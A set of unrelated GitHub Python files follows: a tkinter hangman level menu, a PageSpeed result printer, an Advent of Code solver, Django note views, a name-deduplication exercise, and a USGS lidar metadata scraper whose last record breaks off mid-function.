{"seq_id":"5061373423","text":"import os\r\nfrom tkinter import *\r\nfrom tkinter import messagebox\r\ndef easycountries():\r\n    os.startfile(r'countries_easy.py')\r\n    level.destroy()\r\ndef mediumcountries():\r\n    os.startfile(r'countries_medium.py')\r\n    level.destroy()\r\ndef hardcountries():\r\n    os.startfile(r'countries_hard.py')\r\n    level.destroy()\r\ndef easyinfo():\r\n    messagebox.showinfo(\"easy rules\",\"You have 6 chances to win the game, otherwise your man will be hanged\")\r\ndef mediuminfo():\r\n    messagebox.showinfo(\"medium rules\",\"You have 5 chances to win the game, otherwise your man will be hanged\")\r\ndef hardinfo():\r\n    global b\r\n    b+=1\r\n    if b < 3:\r\n        messagebox.showinfo(\"hard rules\",\"You have 4 chances to win the game, otherwise your man will be hanged\")\r\n    else:\r\n        os.startfile(r'nightmare.py')\r\n        level.destroy()\r\n\r\nlevel=Tk()\r\nlevel.title('LEVELS')\r\n\r\nlevel.geometry('300x350')\r\nlevel.resizable(False,False)\r\nb=0\r\nhead = Label(level, text =\"Choose the level\\nof difficulty.\",fg='#D0312D',bg='#C2DFFF',font=(\"arial\",30)).pack()\r\np1=PhotoImage(file=\"desc.png\")\r\nphoto1=PhotoImage(file = r\"easy.png\")\r\nphoto2=PhotoImage(file = r\"medium.png\")\r\nphoto3=PhotoImage(file = r\"hard.png\")\r\nButton(level, text = 'Easy', image = photo1,command=lambda:easycountries()).place(x=90,y=120)\r\nButton(level, text = 'Medium', image = photo2,command=lambda:mediumcountries()).place(x=80,y=200)\r\nButton(level, text = 'Hard', image = photo3,command=lambda:hardcountries()).place(x=90,y=280)\r\nButton(level,image=p1,command=lambda:easyinfo()).place(x=210,y=120)\r\nButton(level,image=p1,command=lambda:mediuminfo()).place(x=230,y=200)\r\nButton(level,image=p1,command=lambda:hardinfo()).place(x=213,y=280)\r\nlevel.config(bg='#C2DFFF')\r\nlevel.mainloop()\r\n","repo_name":"pravocodes/HANGMAN","sub_path":"python code/level_countries.py","file_name":"level_countries.py","file_ext":"py","file_size_in_byte":1750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
{"seq_id":"22085958402","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\ndef results(metadata, labdata, cruxdata, verbose):\n    if not verbose:\n        return None\n\n
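    # Lighthouse lab timings arrive in milliseconds and the score as 0..1; the format strings below scale most timings to seconds and the score to 0..100\n    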
print(metadata.get('time'))\n print('Lighthouse Version: {lighthouseVersion}'.format(\n lighthouseVersion = metadata.get('lighthouse_version')\n ))\n print()\n print('Score: {score:.0f} (LCP: {lcp:.1f} s; CLS: {cls:.3f}; FCP: {fcp:.1f} s; Speed Index: {speedIndex:.1f} s; TTI: {tti:.1f} s; TBT: {tbt} ms)'.format(\n score = labdata.get('score') * 100,\n lcp = labdata.get('lcp') / 1000,\n cls = labdata.get('cls') / 10,\n fcp = labdata.get('fcp') / 1000,\n speedIndex = labdata.get('speed_index') / 1000,\n tti = labdata.get('tti') / 1000,\n tbt = labdata.get('tbt')\n ))\n\n print()\n\n if (len(cruxdata) > 0):\n print('CrUX-Data')\n if ('crux_fcp' in cruxdata):\n print('FCP: {cruxFcp:.1f} s ({cruxFcpCat}) (Good {cruxFcpGood:.0f}% / Avg {cruxFcpAvg:.0f}% / Bad {cruxFcpBad:.0f}%)'.format(\n cruxFcp = cruxdata.get('crux_fcp') / 1000,\n cruxFcpCat = cruxdata.get('crux_fcp_category'),\n cruxFcpGood = cruxdata.get('crux_fcp_proportions_good') * 100,\n cruxFcpAvg = cruxdata.get('crux_fcp_proportions_average') * 100,\n cruxFcpBad = cruxdata.get('crux_fcp_proportions_bad') * 100\n ))\n\n if ('crux_lcp' in cruxdata):\n print('LCP: {cruxLcp:.1f} s ({cruxLcpCat}) (Good {cruxLcpGood:.0f}% / Avg {cruxLcpAvg:.0f}% / Bad {cruxLcpBad:.0f}%)'.format(\n cruxLcp = cruxdata.get('crux_lcp') / 1000,\n cruxLcpCat = cruxdata.get('crux_lcp_category'),\n cruxLcpGood = cruxdata.get('crux_lcp_proportions_good') * 100,\n cruxLcpAvg = cruxdata.get('crux_lcp_proportions_average') * 100,\n cruxLcpBad = cruxdata.get('crux_lcp_proportions_bad') * 100\n ))\n\n if ('crux_fid' in cruxdata):\n print('FID: {cruxFid} ms ({cruxFidCat}) (Good {cruxFidGood:.0f}% / Avg {cruxFidAvg:.0f}% / Bad {cruxFidBad:.0f}%)'.format(\n cruxFid = cruxdata.get('crux_fid'),\n cruxFidCat = cruxdata.get('crux_fid_category'),\n cruxFidGood = cruxdata.get('crux_fid_proportions_good') * 100,\n cruxFidAvg = cruxdata.get('crux_fid_proportions_average') * 100,\n cruxFidBad = cruxdata.get('crux_fid_proportions_bad') * 100\n ))\n\n if ('crux_cls' in cruxdata):\n print('CLS: {cruxCls:.3f} ({cruxClsCat}) (Good {cruxClsGood:.0f}% / Avg {cruxClsAvg:.0f}% / Bad {cruxClsBad:.0f}%)'.format(\n cruxCls = cruxdata.get('crux_cls') / 100,\n cruxClsCat = cruxdata.get('crux_cls_category'),\n cruxClsGood = cruxdata.get('crux_cls_proportions_good') * 100,\n cruxClsAvg = cruxdata.get('crux_cls_proportions_average') * 100,\n cruxClsBad = cruxdata.get('crux_cls_proportions_bad') * 100\n ))\n\n print()\n\ndef divider(verbose):\n if not verbose:\n return None\n\n print()\n _banner(40)\n print()\n\ndef _banner(length):\n border = '=' * length\n print(border)\n\ndef info(verbose, add_empty_lines, text, format=[]):\n if not verbose:\n return None\n\n print(text.format(*format))\n\n for l in range(0, add_empty_lines):\n print()","repo_name":"maczarr/pagespeed10x","sub_path":"pagespeed10x/print_out.py","file_name":"print_out.py","file_ext":"py","file_size_in_byte":3083,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"47"} +{"seq_id":"21929303422","text":"from dataclasses import dataclass, field\nfrom typing import List\n\nfrom aoc import get_lines\n\nTOTAL_SIZE = 70_000_000\n\nSIZE_NEEDED = 30_000_000\n\n\n@dataclass\nclass Node:\n name: str\n size: int = 0\n is_file: bool = False\n parent: 'Node' = None\n children: dict[str, 'Node'] = field(default_factory=dict)\n\n\ndef parse_input(lines):\n root = Node('/')\n cur_node = root\n for line in lines:\n tokenz = line.split()\n if line.startswith('$'):\n cur_node = parse_command(cur_node=cur_node, 
root=root, line=line, tokenz=tokenz)\n else:\n parse_ls_output(cur_node=cur_node, tokenz=tokenz)\n return root\n\n\ndef parse_ls_output(cur_node, tokenz):\n size_or_dir, name = tokenz[0], tokenz[1]\n if size_or_dir == 'dir' and name not in cur_node.children.keys():\n cur_node.children[name] = Node(name=name, parent=cur_node)\n elif name not in cur_node.children.keys():\n cur_node.children[name] = Node(name=name, size=int(size_or_dir), is_file=True, parent=cur_node)\n\n\ndef parse_command(cur_node: Node, root: Node, line: str, tokenz: List[str]) -> Node:\n if 'cd' in line:\n folder = tokenz[2]\n if folder == '..':\n return cur_node.parent\n if folder == '/':\n return root\n if folder not in cur_node.children.keys():\n cur_node.children[folder] = Node(folder)\n return cur_node.children[folder]\n if 'ls' in line:\n pass\n return cur_node\n\n\ndef calc_sum(node: Node, sizes: List[int]) -> (int, List[int]):\n if node.is_file:\n return node.size, sizes\n sizes.append(sum(calc_sum(child, sizes)[0] for child in node.children.values()))\n return sizes[-1], sizes\n\n\ndef part_1(sizes: List[int]) -> int:\n return sum(filter(lambda x: x < 100000, sizes))\n\n\ndef part_2(sizes: List[int], cur_used: int) -> int:\n needed = SIZE_NEEDED - (TOTAL_SIZE - cur_used)\n return min(filter(lambda x: x > needed, sizes))\n\n\ndef main():\n lines = get_lines(\"input_07.txt\")\n cur_used, sizes = calc_sum(parse_input(lines), [])\n print(\"Part 1:\", part_1(sizes)) # 1306611\n print(\"Part 2:\", part_2(sizes, cur_used)) # 13210366\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"weichslgartner/AdventOfCode2022","sub_path":"Python/day_07.py","file_name":"day_07.py","file_ext":"py","file_size_in_byte":2204,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"47"} +{"seq_id":"14297464073","text":"from django.shortcuts import render,redirect\r\nfrom django.contrib.auth.decorators import login_required\r\nfrom notes.models import Note\r\nfrom notes.forms import NoteForm\r\n# Create your views here.\r\n\r\n@login_required\r\ndef note_list(request):\r\n notes = Note.objects.filter(created_by=request.user)\r\n return render(request, 'note_list.html', {'notes': notes})\r\n\r\n@login_required\r\ndef create_note(request):\r\n if request.method == 'POST':\r\n form = NoteForm(request.POST, request.FILES)\r\n if form.is_valid():\r\n note = form.save(commit=False)\r\n note.created_by = request.user\r\n note.save()\r\n form.save_m2m()\r\n return redirect('note_list')\r\n else:\r\n form = NoteForm()\r\n return render(request, 'create_note.html', {'form': form})","repo_name":"DandangiBalu/Note_storage_project","sub_path":"note_storage_project/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"14598157799","text":"import time\n\nstart_time = time.time()\n\nf = open('names_1.txt', 'r')\nnames_1 = f.read().split(\"\\n\") # List containing 10000 names\nf.close()\n\nf = open('names_2.txt', 'r')\nnames_2 = f.read().split(\"\\n\") # List containing 10000 names\nf.close()\n\nduplicates = []\nnames_dict ={} # Return the list of duplicates in this data structure\n\n# Replace the nested for loops below with your improvements\nfor name_1 in names_1:\n names_dict[name_1] = True\nfor name_2 in names_2:\n if name_2 in names_dict:\n duplicates.append(name_2)\n\nend_time = time.time()\nprint (f\"{len(duplicates)} duplicates:\\n\\n{', '.join(duplicates)}\\n\\n\")\nprint 
(f\"runtime: {end_time - start_time} seconds\")\n\n# ---------- Stretch Goal -----------\n# Python has built-in tools that allow for a very efficient approach to this problem\n# What's the best time you can accomplish? Thare are no restrictions on techniques or data\n# structures, but you may not import any additional libraries that you did not write yourself.\n","repo_name":"ValeriiaMur/Python-books-and-exercises","sub_path":"names/names.py","file_name":"names.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"47"} +{"seq_id":"42303535645","text":"import subprocess\nimport re\nimport os\nimport sys\nimport random\nimport json\nfrom shapely.geometry import Polygon, Point\nfrom datetime import datetime\n\n# configure URL base to come from a CONFIG file\n# TODO: run a check on base URL to confirm that it is still viable\nurl_base = 'https://rockyweb.usgs.gov/vdelivery/Datasets/Staged/Elevation/LPC/Projects'\n\ndef downloads_dir_get(project_id):\n dir_path = 'projects/%s/_downloads' % (project_id)\n if not os.path.isdir(dir_path):\n os.makedirs(dir_path)\n return dir_path\n\ndef project_db_get(project_id, subproject_id):\n path = 'projects/%s/%s/data.json' % (project_id, subproject_id)\n data = {}\n if not os.path.isfile(path):\n f = open(path, 'w')\n f.write('{}')\n f.close()\n else:\n f = open(path)\n data = json.load(f)\n f.close()\n return data\n\ndef project_db_save(project_id, subproject_id, data):\n path = 'projects/%s/%s/data.json' % (project_id, subproject_id)\n f = open(path, 'w')\n charsWritten = f.write(json.dumps(data))\n f.close()\n return charsWritten > 0\n\ndef projects_get(is_return_json=False):\n index_dir = 'projects/_index'\n if not os.path.isdir(index_dir+'/backup'):\n os.makedirs(index_dir+'/backup', 0o774, True) # makde {projects_dir}/_index/backup, as that will auto-create _index/\n index_filename = '%s/index.json' % index_dir\n\n projects = None\n if not os.path.isfile(index_filename):\n projects = {'dateChecked': None, 'dateModified': None, 'data':{}}\n index_file = open(index_filename, 'w')\n json.dump(projects, index_file)\n index_file.close()\n else:\n jsonFile = open(index_filename, 'r')\n projects = json.load(jsonFile)\n jsonFile.close()\n\n projects_list_add_meta_data(projects['data'])\n\n return projects if not is_return_json else json.dumps(projects)\n\n\n\n\ndef projects_list_add_meta_data(projects, parent_dir=''):\n if not projects:\n return projects\n\n project_dirs_list = os.listdir('projects/%s' % parent_dir)\n for dir in project_dirs_list:\n if dir[0] == '.' 
or dir[0] == '_':\n            continue\n        projects[dir]['dateScraped'] = None\n        project_meta_data_filepath = 'projects/%s%s/index.json' % (parent_dir+'/' if parent_dir else '', dir)\n        if os.path.isfile(project_meta_data_filepath):\n            project_meta_data_file = open(project_meta_data_filepath, 'r')\n            project_meta_data = json.load(project_meta_data_file)\n            projects[dir]['dateScraped'] = project_meta_data['dateScraped']\n    return projects\n\n\n\ndef projects_list_compare(new_projects, old_projects):\n    changes = {}\n    for k in new_projects:\n        if not k in old_projects:\n            changes[k] = 'added on '+new_projects[k]['dateModified']\n            new_projects[k]['isNew'] = True\n        elif new_projects[k]['dateModified'] != old_projects[k]['dateModified']:\n            new_projects[k]['oldDateModified'] = old_projects[k]['dateModified']\n            changes[k] = 'was updated on %s' % new_projects[k]['dateModified']\n    for k in old_projects:\n        if not k in new_projects:\n            changes[k] = 'removed'\n            new_projects[k] = old_projects[k]\n            new_projects[k]['isRemovedFromServer'] = True\n\n    if len(changes.keys()) == 0:\n        return None\n    else:\n        return changes\n\ndef projects_scrape(is_return_json=False):\n    html_filepath = 'projects/_index/index.html'\n    json_filepath = 'projects/_index/index.json'\n    backup_dir = 'projects/_index/backup'\n#    cmd = \"wget -S --quiet -t 1 -O %s %s \" % (html_filepath, url_base)\n#    wget_process = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n#    wget_process_out = str(wget_process.communicate()[0], 'utf-8')\n#    if wget_process_out != None and wget_process_out != '':\n#        status = 'success'\n#    else:\n#        status = 'failed'\n#        # TODO: log miss\n\n    file = open(html_filepath)\n    file.seek(0)\n\n    regex = re.compile('<img[^>]+alt=\"\\\\[DIR\\\\]\">\\\\s*<a href=\"([^\"]+)\">[^<]+</a>\\\\s+(\\\\d{4}-\\\\d\\\\d-\\\\d\\\\d \\\\d\\\\d:\\\\d\\\\d)', re.IGNORECASE)\n    # e.g.: <img ... alt=\"[DIR]\"> <a href=\"WI_Statewide_2021_B21/\">WI_Statewide_2021_B21/</a>  2023-02-10 11:13    -\n\n    projects_list_scraped = {}\n    for line in file:\n        match = regex.search(line)\n        # project folders always contain an underscore or hyphen\n        if match != None and ('_' in match.group(1) or '-' in match.group(1)):\n            projects_list_scraped[match.group(1).replace('/', '')] = {'dateModified': match.group(2), 'dateScraped': None}\n\n    file.close()\n\n    projects = projects_get(False)\n    projects['dataChanges'] = None\n\n    changes = None\n    if projects:\n        changes = projects_list_compare(projects_list_scraped, projects['data'])\n        if not changes:\n            # add extra data for each project (from local dir meta)\n            projects_list_add_meta_data(projects['data'])\n\n            projects['dateChecked'] = datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n            return projects if not 
is_return_json else json.dumps(projects)\n\ndef subprojects_get(project_id, is_return_json=False):\n index_dir = 'projects/%s'\n if not os.path.isdir(index_dir+'/backup'):\n os.makedirs(index_dir+'/backup', 0o774, True) # makde {projects_dir}/_index/backup, as that will auto-create _index/\n index_filename = '%s/index.json' % index_dir\n\n projects = None\n if not os.path.isfile(index_filename):\n projects = {'dateChecked': None, 'dateModified': None, 'data':{}}\n index_file = open(index_filename, 'w')\n json.dump(projects, index_file)\n index_file.close()\n else:\n json_file = open(index_filename, 'r')\n projects = json.load(json_file)\n json_file.close()\n\n projects_list_add_meta_data(projects['data'])\n\n return projects if not is_return_json else json.dumps(projects)\n\n\n\n\ndef project_metadata_count(project_id):\n downloads_dir = downloads_dir_get(project_id)\n # grab all JSONs in the \"download\" folder for individual data file info\n cmd = \"ls %s/*.json | wc -l | cat\" % (downloads_dir)\n scrape_concat_process = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n scrape_concat_process_out = str(scrape_concat_process.communicate()[0], 'utf-8')\n return scrape_concat_process_out\n\n\ndef project_get(project_id, is_return_json=False):\n downloads_dir = downloads_dir_get(project_id)\n index_dir = 'projects/%s' % project_id\n if not os.path.isdir(index_dir):\n os.makedirs(index_dir)\n index_filename = 'projects/%s/index.json' % (project_id)\n project = {\"dateScraped\": None, \"subprojects\": None, \"hasMetadata\": False, \"isMetadataZipped\": False, \"hasLaz\": False, \"data\": None}\n\n if os.path.isfile(index_filename):\n index_file = open(index_filename, 'r')\n project = json.load(index_file)\n index_file.close()\n else:\n index_file = open(index_filename, 'w')\n json.dump(project, index_file)\n index_file.close()\n\n if not project['dateScraped']:\n return json.dumps(project) if is_return_json else project\n\n if project['subprojects']:\n for subproject_id in project['subprojects']:\n subproject_filename = 'projects/%s/%s/index.json' % (project_id, subproject_id)\n if os.path.isfile(subproject_filename):\n subproject_file = open(subproject_filename, 'r')\n subproject = json.load(subproject_file)\n project['subprojects'][subproject_id]['dateScraped'] = subproject['dateScraped']\n\n # grab all JSONs in the \"download\" folder for individual data file info\n cmd = \"cat %s/*.json 2>/dev/null\" % (downloads_dir)\n scrape_concat_process = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n scrape_concat_process_out = str(scrape_concat_process.communicate()[0], 'utf-8')\n scraped_files_text = '[]'\n\n # place all files output in an array/list\n if scrape_concat_process_out != None and scrape_concat_process_out != '':\n scraped_files_text = '[%s]' % (scrape_concat_process_out.replace(\"}{\", \"},{\"))\n\n project_data_list = json.loads(scraped_files_text)\n project['data'] = {}\n for item in project_data_list:\n project['data'][item['name']] = item\n\n return json.dumps(project) if is_return_json else project\n\n\n\ndef project_scrape(project_id, is_return_json=False):\n project = project_get(project_id)\n project['dateScraped'] = datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n project_data = project.pop('data') # do not save the data (that lives in separate files)\n\n downloads_dir = downloads_dir_get(project_id)\n index_filename = 'projects/%s/index.json' % (project_id)\n index_html_filename = downloads_dir + 
'/index.html'\n    index_url = '%s/%s/' % (url_base, project_id)\n\n    wget_status = wget_fetch(index_url, index_html_filename, 9)\n    if wget_status != True:\n        project['error'] = 'failed to fetch index of %s (%s): %s' % (project_id, index_url, wget_status)\n        index_file = open(index_filename, 'w')\n        json.dump(project, index_file)\n        index_file.close()\n        return json.dumps(project) if is_return_json else project\n\n    regex_dir = re.compile('<img[^>]+alt=\"\\\\[DIR\\\\]\">\\\\s*<a href=\"([^\"]+)\">[^<]+</a>\\\\s+(\\\\d{4}-\\\\d\\\\d-\\\\d\\\\d \\\\d\\\\d:\\\\d\\\\d)', re.IGNORECASE)\n\n    index_html_file = open(index_html_filename, 'r')\n    index_html_file.seek(0)\n\n    dirs = {}\n    for line in index_html_file:\n        match_dir = regex_dir.search(line)\n        if match_dir != None:\n            dir = match_dir.group(1).replace('/', '')\n            dirs[dir] = {'dateModified': match_dir.group(2)}\n\n    if not 'metadata' in dirs:\n        project['subprojects'] = dirs\n    else:\n        project['hasMetadata'] = True\n\n    if 'laz' in dirs:\n        project['hasLaz'] = True\n\n    index_file = open(index_filename, 'w')\n    json.dump(project, index_file)\n    index_file.close()\n\n    if project['hasMetadata']:\n        project_data = project_metadata_index_scrape(project_id, project_data)\n\n    project['data'] = project_data # still return the data which lives in separate files for each project file/tile\n    return json.dumps(project) if is_return_json else project\n\ndef project_metadata_index_scrape(project_id, saved_project_data):\n    downloads_dir = downloads_dir_get(project_id)\n\n    index_filename = 'projects/%s/index.json' % (project_id)\n\n    index_file = open(index_filename, 'r')\n    project = json.load(index_file)\n    index_file.close()\n\n    index_html_filename = downloads_dir + '/meta_index.html'\n    index_url = '%s/%s/metadata' % (url_base, project_id)\n\n    wget_status = wget_fetch(index_url, index_html_filename, 9)\n    if wget_status != True:\n        project['error'] = 'failed to fetch meta-data index of %s (%s)' % (project_id, index_url)\n        index_file = open(index_filename, 'w')\n        json.dump(project, index_file)\n        index_file.close()\n        return project\n\n    regex_file = re.compile('<img[^>]+alt=\"\\\\[TXT\\\\]\">\\\\s*<a href=\"([^\"]+)\">[^<]+</a>\\\\s+(\\\\d{4}-\\\\d\\\\d-\\\\d\\\\d \\\\d\\\\d:\\\\d\\\\d)', re.IGNORECASE)\n    regex_zip = re.compile('<img[^>]+compressed.gif[^>]+>\\\\s*<a href=\"([^\"]+)\">[^<]+</a>\\\\s+(\\\\d{4}-\\\\d\\\\d-\\\\d\\\\d \\\\d\\\\d:\\\\d\\\\d)', re.IGNORECASE)\n\n    index_html_file = open(index_html_filename, 'r')\n    index_html_file.seek(0)\n\n    project_data = {}\n    for line in index_html_file:\n        match_file = regex_file.search(line)\n        match_zip = regex_zip.search(line)\n        if match_file != None:\n            meta_name = match_file.group(1).replace('.xml', '')\n            # project has META DATA (not a zip file)\n            project_data[meta_name] = {'dateModified': match_file.group(2)}\n        elif match_zip != None:\n            project['isMetadataZipped'] = True\n            project['zippedData'] = {'file': match_zip.group(1), 'dateModified': match_zip.group(2)}\n\n\n    # project has (META) DATA (not a zip file)\n    if project_data.keys():\n        for k in saved_project_data:\n            if not k in project_data:\n                saved_project_data[k]['isRemoved'] = True\n                project_data[k] = saved_project_data[k]\n        for k in project_data:\n            if not k in saved_project_data:\n                saved_project_data[k] = {'name': k, 'dateScraped': None }\n            saved_project_data[k]['dateModified'] = project_data[k]['dateModified']\n            project_data[k] = saved_project_data[k]\n\n            file = open('%s/%s.json' % (downloads_dir, k), 'w')\n            json.dump(project_data[k], file)\n\n    index_html_file = open(index_filename, 'w')\n    json.dump(project, index_html_file)\n    index_file.close()\n\n    return project_data\n\ndef metadata_files_fetch(project_id, limit=4):\n
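    # re-fetch a tile's metadata XML when it was never scraped, previously failed, or is older than its server-side modification date\n    project = 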
project_get(project_id)\n    i = 0\n    for meta_filename in project['data']:\n        meta_meta = project['data'][meta_filename]\n        if not meta_meta['dateScraped'] or meta_meta['scrapedStatus'] == 'failed' or meta_meta['dateScraped'] < meta_meta['dateModified']:\n            status = metadata_file_fetch(project_id, meta_filename)\n            if status == 'success':\n                (bounds_polygon_coordinates, dates, projection, errors) = metadata_extract_data(project_id, meta_filename)\n                meta_meta['bounds'] = bounds_polygon_coordinates\n                meta_meta['dates'] = dates\n                meta_meta['projection'] = projection\n                meta_meta['errors'] = errors\n\n            print('scraped %s %s' % (meta_filename, status))\n            meta_meta['scrapedStatus'] = status\n            meta_meta['dateScraped'] = datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n\n            meta_filepath = '%s/%s.json' % (downloads_dir_get(project_id), meta_filename)\n            meta_file = open(meta_filepath, 'w')\n            json.dump(meta_meta, meta_file)\n            meta_file.close()\n        else:\n            print('already scraped %s' % (meta_filename))\n\n        i = i + 1\n\n        # Testing\n        if limit > 0 and i > limit:\n            break\n\n    return True\n\ndef metadata_file_fetch(project_id, filename):\n    status = 'in progress'\n    meta_url = '%s/%s/metadata/%s.xml' % (url_base, project_id, filename)\n    dir_path = downloads_dir_get(project_id)\n    download_filepath = '%s/%s.xml' % (dir_path, filename)\n\n    wget_status = wget_fetch(meta_url, download_filepath, 9)\n    return 'success' if wget_status == True else wget_status\n\ndef metadata_extract_data(project_id, filename):\n    dir_path = downloads_dir_get(project_id)\n    file_obj = open(dir_path + '/' + filename + ('.xml' if not '.xml' in filename else ''))\n    file_obj.seek(0)\n\n    date_seen = False\n    date_extracted = False\n    bounds_seen = False\n    bounds_extracted = False\n\n    dates = []\n    bounds = {}\n    projection = ''\n    errors = {}\n\n    for line in file_obj:\n        if (not date_seen and not date_extracted) or line.find('<rngdates>') >= 0:\n            date_seen = True\n\n        if not date_extracted and line.find('<begdate>') >=0:\n            dates.append(line.replace('<begdate>', '').replace('</begdate>', '').strip())\n        if not date_extracted and line.find('<enddate>') >=0:\n            dates.append(line.replace('<enddate>', '').replace('</enddate>', '').strip())\n\n        if date_seen and len(dates) == 2:\n            date_extracted = True\n\n\n        if (not bounds_seen and not bounds_extracted) or line.find('<bounding>') >= 0:\n            bounds_seen = True\n\n        if not bounds_extracted and line.find('<westbc>') >=0:\n            bounds['w'] = float(line.replace('<westbc>', '').replace('</westbc>', '').strip())\n        if not bounds_extracted and line.find('<eastbc>') >=0:\n            bounds['e'] = float(line.replace('<eastbc>', '').replace('</eastbc>', '').strip())\n        if not bounds_extracted and line.find('<northbc>') >=0:\n            bounds['n'] = float(line.replace('<northbc>', '').replace('</northbc>', '').strip())\n        if not bounds_extracted and line.find('<southbc>') >=0:\n            bounds['s'] = float(line.replace('<southbc>', '').replace('</southbc>', '').strip())\n\n        if bounds_seen and len(bounds.keys()) == 4:\n            bounds_extracted = True\n\n        # datum/projection name; assumes it lives in the FGDC <horizdn> element of the USGS metadata\n        if line.find('<horizdn>') >= 0:\n            projection = line.replace('<horizdn>', '').replace('</horizdn>', '').strip()\n\n    projection_cleanup_regex = re.compile('\\\\s*/.+$', re.IGNORECASE)\n    if projection != '':\n        projection = projection_cleanup_regex.sub('', projection)\n        projection = projection.strip()\n\n\n    if len(bounds.keys()) < 4:\n        errors['bounds'] = 'fewer than 4 vertices in bbox'\n        bounds_polygon_coordinates = None\n    else:\n        bounds_polygon_coordinates = [\n            [bounds['w'], bounds['n']],\n            [bounds['e'], bounds['n']],\n            [bounds['e'], bounds['s']],\n            [bounds['w'], bounds['s']]]\n\n    return (bounds_polygon_coordinates, dates, projection, errors)\n\n\ndef polygon_multipolygon_overlap_check(lidar_polygon, city_multi_polygon):\n
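    # a multipolygon is a list of polygons, each given as [shell, *holes]; the lidar tile's bbox polygon is tested against every shell\n    p1 = 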
Polygon(lidar_polygon)\n is_intersects = False\n for polygon_i in city_multi_polygon:\n p2 = Polygon(polygon_i[0]) # take the first \"shell\" polygon (and not the subsequent \"holes\")\n is_intersects = is_intersects or p1.intersects(p2)\n\n return is_intersects\n\n\ndef city_polygon_get(city_id):\n file_obj = open('../cities/%s.json' % city_id)\n bounds = json.loads(file_obj.read())\n multipolygon = bounds.get('geometries')[0].get('coordinates')\n return multipolygon\n\ndef find_overlapping_lidar_scans(project_id, subproject_id, city_id):\n city_multi_polygon = city_polygon_get(city_id)\n\n dir_path = downloads_dir_get(project_id)\n file_list = os.listdir(dir_path)\n\n file_bounds_and_date = {}\n for f in file_list:\n if f.find('.xml') < 0:\n continue\n bounds_and_date = metadata_extract_data(project_id, subproject_id, f)\n if bounds_and_date != None:\n if polygon_multipolygon_overlap_check(bounds_and_date[0], city_multi_polygon):\n file_bounds_and_date[f] = bounds_and_date\n\n return file_bounds_and_date\n\ndef download_meta_shape_files_from_zip(index_filename, project_id, subproject_id, limit=4):\n # download ZIP\n # extract ZIP\n # extract geo info from SHP file => geojson ?!\n # USE geopandas to read SHP file (as long as all other files are in same dir)\n return None\n\nprojections_aliases = {\n 'NAD83(CSRS98)' : 'EPSG:4140',\n 'NAD83(HARN)' : 'EPSG:4152',\n 'WGS 84' : 'EPSG:4326',\n 'NAD83(CSRS)' : 'EPSG:4617',\n 'NAVD88 height' : 'EPSG:5703',\n 'NAD83(2011)' : 'EPSG:6318',\n 'NAD83(CSRS)v2' : 'EPSG:8237',\n 'NAD83(CSRS)v3' : 'EPSG:8240',\n 'NAD83(CSRS)v4' : 'EPSG:8246',\n 'NAD83(CSRS)v6' : 'EPSG:8252',\n 'NAD83(CSRS)v7' : 'EPSG:8255'\n}\n\ndef projection_convert(coordinates, projection, geometry_type):\n import geopandas\n\n # CAlifornia projection 6420 (ID is the SW corner of the tile \"w123123n123123\")\n # \"EPSG:6420\"\n # [[6051000,2130000], [6051000,2133000], [6054000,2133000], [6054000,2130000]]\n # https://epsg.io/transform#s_srs=6420&t_srs=4326&x=0.0000000&y=0.0000000\n # x (w->e) 6054000 ---decreases---> 6051000 = 3000 (feet wide)\n # y (n->s) 2133000 ---decreases---> 2130000 = 3000 (feet tall)\n\n # data for GeoDataFrame with local-projection coordinates\n if geometry_type == 'polygon':\n geometry = Polygon(coordinates)\n elif geometry_type == 'point':\n geometry = Point(coordinates)\n\n data = {'col1': ['p1'], 'geometry': geometry}\n\n # convert alias/alternate projection ID to standard EPSG ID\n projection_EPSG = projection\n if projection in projections_aliases:\n projection_EPSG = projections_aliases[projection]\n\n print (projection_EPSG)\n # specify projection of coordinates\n geo_data_frame = geopandas.GeoDataFrame(data, crs=projection_EPSG)\n # convert to standard lng/lat\n geo_data_frame_EPSG4326 = geo_data_frame.to_crs(4326)\n\n # returns a Shapely Polygon/Point object\n return geo_data_frame_EPSG4326.geometry[0]\n\n\ndef laz_file_fetch(project_id, subproject_id, filename):\n status = 'in progress'\n dir_path = downloads_dir_get(project_id)\n url = '%s/%s/%s/LAZ/%s' % (url_base, project_id, subproject_id, filename)\n download_filepath = '%s/%s' % (dir_path, filename)\n\n wget_status = wget_fetch(url, download_filepath, 9)\n return 'success' if wget_status == True else wget_status\n\ndef laz_extract_data(project_id, subproject_id, filename, point_limit=0):\n # Buffered read to extract all dates of individual points\n # (buffered so that we do not need HUGE RAM and costly VMs)\n import numpy as np\n import laspy\n\n dir_path = downloads_dir_get(project_id)\n file 
= '%s/%s' % (dir_path, filename)\n\n data = {'bbox': [], 'bbox_polygon': [], 'date_range': [None, None]}\n with laspy.open(file) as f:\n\n # fetch bounding box from header (if meta data did not provide any info on bounding box)\n data['bbox'].append([f.header.min[0], f.header.max[0]]) # x0, y0 = lng0, lat0\n data['bbox'].append([f.header.min[1], f.header.max[1]]) # x1, y1 = lng1, lat1\n data['bbox_polygon'].append([f.header.min[0], f.header.max[1]]) # x0, y1 = lng0, lat1\n data['bbox_polygon'].append([f.header.min[0], f.header.min[1]])\n data['bbox_polygon'].append([f.header.max[0], f.header.min[1]])\n data['bbox_polygon'].append([f.header.max[0], f.header.max[1]])\n # f.header.min[2] # z0 (elevation0)\n # f.header.max[2] # z1 (elevation1)\n\n\n i = point_limit\n for point in f.chunk_iterator(100):\n gps_times = list(point.point_format.dimension_names)\n gps_times_index = gps_times.index('gps_time')\n #gps_time is often used in the laz 1.4 standard. However, the lidar operator may do something weird here 